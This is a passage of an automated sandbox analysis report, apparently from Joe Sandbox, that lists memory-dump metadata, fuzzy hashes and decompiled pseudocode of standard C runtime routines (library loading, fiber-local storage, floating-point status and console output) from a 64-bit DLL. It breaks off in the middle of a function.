                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                        • String ID: -$0$f$p$p
                                                                                                        • API String ID: 3215553584-1865143739
                                                                                                        • Opcode ID: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
                                                                                                        • Instruction ID: 0d3b675d1ba1e12fed773603dcef4e1e4a32ee2d267e71ae78975bacee0ee230
                                                                                                        • Opcode Fuzzy Hash: 3bf02160523cc795b8287601120242312cc0e9fc0a46e7f1dbb3d85bfcf254c4
                                                                                                        • Instruction Fuzzy Hash: DA12E462F0C16B85FB20BB14DC0427976A2FB90756F944137E68A57AC4DF3EE480CB68
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                                                        • String ID:
                                                                                                        • API String ID: 1917832262-0
                                                                                                        • Opcode ID: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
                                                                                                        • Instruction ID: 5d1ece9620996831e33e4cd9d2d68a97c1157ef0649579c94c2bc2d13ed8250f
                                                                                                        • Opcode Fuzzy Hash: 43512701d7355e0956f5cb1433a41ae321c0b5e41867a7adc5de44204bc134c7
                                                                                                        • Instruction Fuzzy Hash: E2911A76608B448ADB65DB28E45132AF7A4F7C9784F144226DACE93BA8DF3CD449CF00
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 77%
                                                                                                        			E00007FFC7FFC2890D8F0(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                                        				void* _t37;
                                                                                                        				signed long long _t57;
                                                                                                        				intOrPtr _t61;
                                                                                                        				signed long long _t72;
                                                                                                        				void* _t75;
                                                                                                        				signed long long _t76;
                                                                                                        				long long _t82;
                                                                                                        				void* _t86;
                                                                                                        				signed long long _t90;
                                                                                                        				signed long long _t91;
                                                                                                        				WCHAR* _t93;
                                                                                                        				long _t96;
                                                                                                        				void* _t99;
                                                                                                        				WCHAR* _t104;
                                                                                                        
                                                                                                        				 *((long long*)(_t86 + 8)) = __rbx;
                                                                                                        				 *((long long*)(_t86 + 0x10)) = _t82;
                                                                                                        				 *((long long*)(_t86 + 0x18)) = __rsi;
                                                                                                        				r15d = __ecx;
                                                                                                        				_t90 =  *0x2897e008; // 0xae6141e854aa
                                                                                                        				_t76 = _t75 | 0xffffffff;
                                                                                                        				_t72 = _t90 ^  *(0x7ffc28900000 + 0x7f840 + _t104 * 8);
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t72 == _t76) goto 0x2890da36;
                                                                                                        				if (_t72 == 0) goto 0x2890d959;
                                                                                                        				_t57 = _t72;
                                                                                                        				goto 0x2890da38;
                                                                                                        				if (__r8 == __r9) goto 0x2890da1b;
                                                                                                        				_t61 =  *((intOrPtr*)(0x7ffc28900000 + 0x7f7a0 + __rsi * 8));
                                                                                                        				if (_t61 == 0) goto 0x2890d980;
                                                                                                        				if (_t61 != _t76) goto 0x2890da75;
                                                                                                        				goto 0x2890da07;
                                                                                                        				r8d = 0x800;
                                                                                                        				LoadLibraryExW(_t104, _t99, _t96);
                                                                                                        				if (_t57 != 0) goto 0x2890da55;
                                                                                                        				if (GetLastError() != 0x57) goto 0x2890d9f5;
                                                                                                        				_t14 = _t57 - 0x50; // -80
                                                                                                        				_t37 = _t14;
                                                                                                        				r8d = _t37;
                                                                                                        				if (E00007FFC7FFC2890F5B0(_t90) == 0) goto 0x2890d9f5;
                                                                                                        				r8d = _t37;
                                                                                                        				if (E00007FFC7FFC2890F5B0(_t90) == 0) goto 0x2890d9f5;
                                                                                                        				r8d = 0;
                                                                                                        				LoadLibraryExW(_t93, _t75);
                                                                                                        				if (_t57 != 0) goto 0x2890da55;
                                                                                                        				 *((intOrPtr*)(0x7ffc28900000 + 0x7f7a0 + __rsi * 8)) = _t76;
                                                                                                        				if (__r8 + 4 != __r9) goto 0x2890d962;
                                                                                                        				_t91 =  *0x2897e008; // 0xae6141e854aa
                                                                                                        				asm("dec eax");
                                                                                                        				 *(0x7ffc28900000 + 0x7f840 + _t104 * 8) = _t76 ^ _t91;
                                                                                                        				return 0;
                                                                                                        			}

















                                                                                                        0x7ffc2890d8f0
                                                                                                        0x7ffc2890d8f5
                                                                                                        0x7ffc2890d8fa
                                                                                                        0x7ffc2890d90c
                                                                                                        0x7ffc2890d927
                                                                                                        0x7ffc2890d92e
                                                                                                        0x7ffc2890d938
                                                                                                        0x7ffc2890d940
                                                                                                        0x7ffc2890d946
                                                                                                        0x7ffc2890d94f
                                                                                                        0x7ffc2890d951
                                                                                                        0x7ffc2890d954
                                                                                                        0x7ffc2890d95c
                                                                                                        0x7ffc2890d965
                                                                                                        0x7ffc2890d970
                                                                                                        0x7ffc2890d975
                                                                                                        0x7ffc2890d97b
                                                                                                        0x7ffc2890d98d
                                                                                                        0x7ffc2890d993
                                                                                                        0x7ffc2890d99f
                                                                                                        0x7ffc2890d9ae
                                                                                                        0x7ffc2890d9b0
                                                                                                        0x7ffc2890d9b0
                                                                                                        0x7ffc2890d9b6
                                                                                                        0x7ffc2890d9c7
                                                                                                        0x7ffc2890d9c9
                                                                                                        0x7ffc2890d9dd
                                                                                                        0x7ffc2890d9df
                                                                                                        0x7ffc2890d9e7
                                                                                                        0x7ffc2890d9f3
                                                                                                        0x7ffc2890d9ff
                                                                                                        0x7ffc2890da0e
                                                                                                        0x7ffc2890da14
                                                                                                        0x7ffc2890da28
                                                                                                        0x7ffc2890da2e
                                                                                                        0x7ffc2890da54

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                        • API String ID: 3013587201-537541572
                                                                                                        • Opcode ID: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
                                                                                                        • Instruction ID: 00eb5800da5ac4f0538c1216b43e097d1600fad717b34d04f124d1d9750cdff2
                                                                                                        • Opcode Fuzzy Hash: 0c6698adf364fca3294d1cea9b6c9e04e4170ebc5fe981ec924076e30e6001fe
                                                                                                        • Instruction Fuzzy Hash: 1741E422B1DA2645FA11AB1A9C042762295FF05BE1F094237DD1D4B7C4DE3EF444C328
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 2506987500-0
                                                                                                        • Opcode ID: 2a24962a4ae2edce6784a866bb76ad44041d802b6157795572d3a238faec6782
                                                                                                        • Instruction ID: 554682969e2ccaf9dbffe6e4ef682eeaddcec5afa46308f37c8cee9209b0ae82
                                                                                                        • Opcode Fuzzy Hash: 2a24962a4ae2edce6784a866bb76ad44041d802b6157795572d3a238faec6782
                                                                                                        • Instruction Fuzzy Hash: B8218020F0C67E81FA6877655D4123D6182EF84BB6F044736E97E476C6EE2EB441C228
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                        • String ID: CONOUT$
                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                        • Opcode ID: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
                                                                                                        • Instruction ID: 8c76a116569a73e22166dcfbdd636c4825e9d0e77c3adc6af0dab368573e8200
                                                                                                        • Opcode Fuzzy Hash: f8beb9e43c57309afe536eff65cc898a76b098485244b241a9a6a9293252ff3c
                                                                                                        • Instruction Fuzzy Hash: B411D621718A6586E790AB56FC4432963A4FB48FE6F040235DE1D877D4DF3CD404C758
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FFC2890B429,?,?,?,?,00007FFC28910426,?,?,00000000,00007FFC2890D8B7,?,?,?), ref: 00007FFC2890BA5B
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC2890B429,?,?,?,?,00007FFC28910426,?,?,00000000,00007FFC2890D8B7,?,?,?), ref: 00007FFC2890BA91
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC2890B429,?,?,?,?,00007FFC28910426,?,?,00000000,00007FFC2890D8B7,?,?,?), ref: 00007FFC2890BABE
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC2890B429,?,?,?,?,00007FFC28910426,?,?,00000000,00007FFC2890D8B7,?,?,?), ref: 00007FFC2890BACF
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC2890B429,?,?,?,?,00007FFC28910426,?,?,00000000,00007FFC2890D8B7,?,?,?), ref: 00007FFC2890BAE0
                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FFC2890B429,?,?,?,?,00007FFC28910426,?,?,00000000,00007FFC2890D8B7,?,?,?), ref: 00007FFC2890BAFB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 2506987500-0
                                                                                                        • Opcode ID: e0883a567a9e29bbbb1b83d6b87fb9bd1dcc803791e6801ea57a03ec04fde850
                                                                                                        • Instruction ID: 20bc7123af88d637f15b6a829fe22d153606ad1217fb020fcfaad3ed1d585c75
                                                                                                        • Opcode Fuzzy Hash: e0883a567a9e29bbbb1b83d6b87fb9bd1dcc803791e6801ea57a03ec04fde850
                                                                                                        • Instruction Fuzzy Hash: ED116020B0C66E81FA547775AD512392282EF84BB2F044737E93E476D6EE6EF441C228
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                        • Opcode ID: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
                                                                                                        • Instruction ID: b9c70b80620d1c65749d0311d6757b30bf03211a05b1de74d21c2d31a6e14974
                                                                                                        • Opcode Fuzzy Hash: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
                                                                                                        • Instruction Fuzzy Hash: 09F06261B1872A85EB10AB64EC5437A6360FF897A3F580237DA6E452F4CF3DD449C328
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 85%
                                                                                                        			E00007FFC7FFC2890EB68(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                                                                        				signed int _t27;
                                                                                                        				signed int _t28;
                                                                                                        				signed int _t29;
                                                                                                        				signed int _t30;
                                                                                                        				signed int _t31;
                                                                                                        				signed int _t42;
                                                                                                        				signed int _t43;
                                                                                                        				signed int _t44;
                                                                                                        				signed int _t46;
                                                                                                        				void* _t51;
                                                                                                        
                                                                                                        				_a8 = __rbx;
                                                                                                        				_a16 = __rsi;
                                                                                                        				_t27 = __ecx & 0x0000001f;
                                                                                                        				if ((__ecx & 0x00000008) == 0) goto 0x2890eb9a;
                                                                                                        				if (sil >= 0) goto 0x2890eb9a;
                                                                                                        				E00007FFC7FFC28911CEC(_t27, _t51);
                                                                                                        				_t28 = _t27 & 0xfffffff7;
                                                                                                        				goto 0x2890ebf1;
                                                                                                        				_t42 = 0x00000004 & dil;
                                                                                                        				if (_t42 == 0) goto 0x2890ebb5;
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t42 >= 0) goto 0x2890ebb5;
                                                                                                        				E00007FFC7FFC28911CEC(_t28, _t51);
                                                                                                        				_t29 = _t28 & 0xfffffffb;
                                                                                                        				goto 0x2890ebf1;
                                                                                                        				_t43 = dil & 0x00000001;
                                                                                                        				if (_t43 == 0) goto 0x2890ebd1;
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t43 >= 0) goto 0x2890ebd1;
                                                                                                        				E00007FFC7FFC28911CEC(_t29, _t51);
                                                                                                        				_t30 = _t29 & 0xfffffffe;
                                                                                                        				goto 0x2890ebf1;
                                                                                                        				_t44 = dil & 0x00000002;
                                                                                                        				if (_t44 == 0) goto 0x2890ebf1;
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t44 >= 0) goto 0x2890ebf1;
                                                                                                        				if ((dil & 0x00000010) == 0) goto 0x2890ebee;
                                                                                                        				E00007FFC7FFC28911CEC(_t30, _t51);
                                                                                                        				_t31 = _t30 & 0xfffffffd;
                                                                                                        				_t46 = dil & 0x00000010;
                                                                                                        				if (_t46 == 0) goto 0x2890ec0b;
                                                                                                        				asm("dec eax");
                                                                                                        				if (_t46 >= 0) goto 0x2890ec0b;
                                                                                                        				E00007FFC7FFC28911CEC(_t31, _t51);
                                                                                                        				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                                                                                        			}













                                                                                                        0x7ffc2890eb68
                                                                                                        0x7ffc2890eb6d
                                                                                                        0x7ffc2890eb7c
                                                                                                        0x7ffc2890eb84
                                                                                                        0x7ffc2890eb89
                                                                                                        0x7ffc2890eb90
                                                                                                        0x7ffc2890eb95
                                                                                                        0x7ffc2890eb98
                                                                                                        0x7ffc2890eb9f
                                                                                                        0x7ffc2890eba2
                                                                                                        0x7ffc2890eba4
                                                                                                        0x7ffc2890eba9
                                                                                                        0x7ffc2890ebab
                                                                                                        0x7ffc2890ebb0
                                                                                                        0x7ffc2890ebb3
                                                                                                        0x7ffc2890ebb5
                                                                                                        0x7ffc2890ebb9
                                                                                                        0x7ffc2890ebbb
                                                                                                        0x7ffc2890ebc0
                                                                                                        0x7ffc2890ebc7
                                                                                                        0x7ffc2890ebcc
                                                                                                        0x7ffc2890ebcf
                                                                                                        0x7ffc2890ebd1
                                                                                                        0x7ffc2890ebd5
                                                                                                        0x7ffc2890ebd7
                                                                                                        0x7ffc2890ebdc
                                                                                                        0x7ffc2890ebe2
                                                                                                        0x7ffc2890ebe9
                                                                                                        0x7ffc2890ebee
                                                                                                        0x7ffc2890ebf1
                                                                                                        0x7ffc2890ebf5
                                                                                                        0x7ffc2890ebf7
                                                                                                        0x7ffc2890ebfc
                                                                                                        0x7ffc2890ec03
                                                                                                        0x7ffc2890ec21

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _set_statfp
                                                                                                        • String ID:
                                                                                                        • API String ID: 1156100317-0
                                                                                                        • Opcode ID: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
                                                                                                        • Instruction ID: 1445e606d2c0fd607c2525782d57d36761c59b967c4f24674c253649ff6d70cd
                                                                                                        • Opcode Fuzzy Hash: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
                                                                                                        • Instruction Fuzzy Hash: 6C110136E2EA3B41F264312EED5233C1548EF98372F040632F92F862D6CE2DA841C12C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FFC28909403,?,?,00000000,00007FFC2890969E,?,?,?,?,?,00007FFC2890962A), ref: 00007FFC2890BB33
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC28909403,?,?,00000000,00007FFC2890969E,?,?,?,?,?,00007FFC2890962A), ref: 00007FFC2890BB52
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC28909403,?,?,00000000,00007FFC2890969E,?,?,?,?,?,00007FFC2890962A), ref: 00007FFC2890BB7A
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC28909403,?,?,00000000,00007FFC2890969E,?,?,?,?,?,00007FFC2890962A), ref: 00007FFC2890BB8B
                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFC28909403,?,?,00000000,00007FFC2890969E,?,?,?,?,?,00007FFC2890962A), ref: 00007FFC2890BB9C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value
                                                                                                        • String ID:
                                                                                                        • API String ID: 3702945584-0
                                                                                                        • Opcode ID: 57e8c6263882d169d07007314577b448fa717f22d551fcd21a9fd8724e606022
                                                                                                        • Instruction ID: 13d59755088597647b892ef13b54a92cfc48a73dc32ca996cddd6d62c0bb1b78
                                                                                                        • Opcode Fuzzy Hash: 57e8c6263882d169d07007314577b448fa717f22d551fcd21a9fd8724e606022
                                                                                                        • Instruction Fuzzy Hash: 6D113D60E0C66E42FA5877256D526795142EF84BB2F044736E83E866DAEE2EF441C228
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value
                                                                                                        • String ID:
                                                                                                        • API String ID: 3702945584-0
                                                                                                        • Opcode ID: 210bbf59f21d8c1aaa94cd5aecfdcc31976e6e74a34733d271c34024d620d784
                                                                                                        • Instruction ID: ef1233d8c14868633e059c44111b7cab5c12a29d9e8146eeca787c174dd6621d
                                                                                                        • Opcode Fuzzy Hash: 210bbf59f21d8c1aaa94cd5aecfdcc31976e6e74a34733d271c34024d620d784
                                                                                                        • Instruction Fuzzy Hash: FC11F750E0C62F42FD68B2755C522791182DF84B76F184B37E93E4A2D2EE2EB441D23C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 49%
                                                                                                        			E00007FFC7FFC28910958(void* __ecx, signed int __edx, void* __esi, void* __ebp, void* __esp, long long __rbx, intOrPtr* __rcx, long long __r8) {
                                                                                                        				void* __rdi;
                                                                                                        				void* __rsi;
                                                                                                        				void* __rbp;
                                                                                                        				intOrPtr _t181;
                                                                                                        				signed int _t186;
                                                                                                        				signed int _t193;
                                                                                                        				signed int _t198;
                                                                                                        				void* _t212;
                                                                                                        				signed char _t213;
                                                                                                        				void* _t263;
                                                                                                        				signed long long _t264;
                                                                                                        				signed long long _t267;
                                                                                                        				long long _t269;
                                                                                                        				signed long long _t271;
                                                                                                        				long long _t276;
                                                                                                        				long long _t278;
                                                                                                        				long long _t280;
                                                                                                        				intOrPtr* _t289;
                                                                                                        				intOrPtr _t294;
                                                                                                        				long long _t295;
                                                                                                        				long long _t318;
                                                                                                        				void* _t326;
                                                                                                        				long long _t327;
                                                                                                        				void* _t328;
                                                                                                        				long long _t329;
                                                                                                        				long long _t331;
                                                                                                        				signed char* _t332;
                                                                                                        				signed char* _t333;
                                                                                                        				signed char* _t334;
                                                                                                        				intOrPtr* _t335;
                                                                                                        				void* _t336;
                                                                                                        				void* _t337;
                                                                                                        				signed long long _t338;
                                                                                                        				intOrPtr _t341;
                                                                                                        				signed long long _t343;
                                                                                                        				void* _t345;
                                                                                                        				intOrPtr* _t347;
                                                                                                        				intOrPtr _t351;
                                                                                                        				signed long long _t356;
                                                                                                        				signed long long _t359;
                                                                                                        				signed long long _t361;
                                                                                                        				void* _t364;
                                                                                                        				long long _t365;
                                                                                                        				long long _t367;
                                                                                                        				char _t368;
                                                                                                        				void* _t372;
                                                                                                        				signed char* _t373;
                                                                                                        				signed long long _t375;
                                                                                                        
                                                                                                        				_t263 = _t337;
                                                                                                        				_t336 = _t263 - 0x57;
                                                                                                        				_t338 = _t337 - 0xe0;
                                                                                                        				 *((long long*)(_t336 - 9)) = 0xfffffffe;
                                                                                                        				 *((long long*)(_t263 + 8)) = __rbx;
                                                                                                        				_t264 =  *0x2897e008; // 0xae6141e854aa
                                                                                                        				 *(_t336 + 0x17) = _t264 ^ _t338;
                                                                                                        				 *((long long*)(_t336 - 0x49)) = __r8;
                                                                                                        				_t289 = __rcx;
                                                                                                        				_t367 =  *((intOrPtr*)(_t336 + 0x7f));
                                                                                                        				 *((long long*)(_t336 - 0x51)) = _t367;
                                                                                                        				 *(_t336 - 0x19) = __edx;
                                                                                                        				_t267 = __edx >> 6;
                                                                                                        				 *(_t336 - 0x59) = _t267;
                                                                                                        				 *(_t336 - 0x11) = __edx;
                                                                                                        				_t375 = __edx + __edx * 8;
                                                                                                        				_t269 =  *((intOrPtr*)( *((intOrPtr*)(0x7ffc28900000 + 0x7f940 + _t267 * 8)) + 0x28 + _t375 * 8));
                                                                                                        				 *((long long*)(_t336 - 0x29)) = _t269;
